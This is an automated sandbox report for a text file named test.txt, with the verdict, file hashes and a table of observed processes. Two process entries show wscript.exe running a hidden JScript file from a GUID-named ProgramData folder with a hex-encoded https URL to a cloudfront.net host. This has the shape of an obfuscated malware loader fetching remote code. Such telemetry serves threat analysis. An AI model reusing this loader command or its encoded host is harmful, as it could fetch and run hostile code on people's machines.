| File name: | test.txt |
| Full analysis: | https://app.any.run/tasks/b1d597cc-0012-4791-9f4e-da7d3e9d8e06 |
| Verdict: | No threats detected |
| Analysis date: | April 30, 2019, 10:07:28 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with no line terminators |
| MD5: | 992C4B80758CBD5B6189610E18DC7D8F |
| SHA1: | 8D311922BCCDA782513B0262B359665746BB89D7 |
| SHA256: | B36A9394A9894040BD02840EBE5CF2CE01422F5515CE763E9F7A86309E5DC286 |
| SSDEEP: | 3:ohAISRsDKCkREzjWLQRnIckFUedXl6TTwLR0USM/T1TMoydKKay+IsWSv:ohERsayWLQRnhM/STwLRdT1TMbdR4I3m |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1388 | C:\Windows\system32\wscript.exe C:\ProgramData\{3F30FA53-B572-7095-33B4-EED7A9F66519}\fica 68747470733a2f2f64326234366537617832617466692e636c6f756466726f6e742e6e6574 //B //E:jscript --IsErIk | C:\Windows\system32\wscript.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft ® Windows Based Script Host Exit code: 1 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 2160 | C:\Windows\system32\wscript.exe C:\ProgramData\{3F30FA53-B572-7095-33B4-EED7A9F66519}\fica 68747470733a2f2f64326234366537617832617466692e636c6f756466726f6e742e6e6574 //B //E:jscript --IsErIk | C:\Windows\system32\wscript.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft ® Windows Based Script Host Exit code: 1 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 2220 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\test.txt | C:\Windows\system32\NOTEPAD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2568 | "C:\Windows\System32\cmd.exe" | C:\Windows\System32\cmd.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||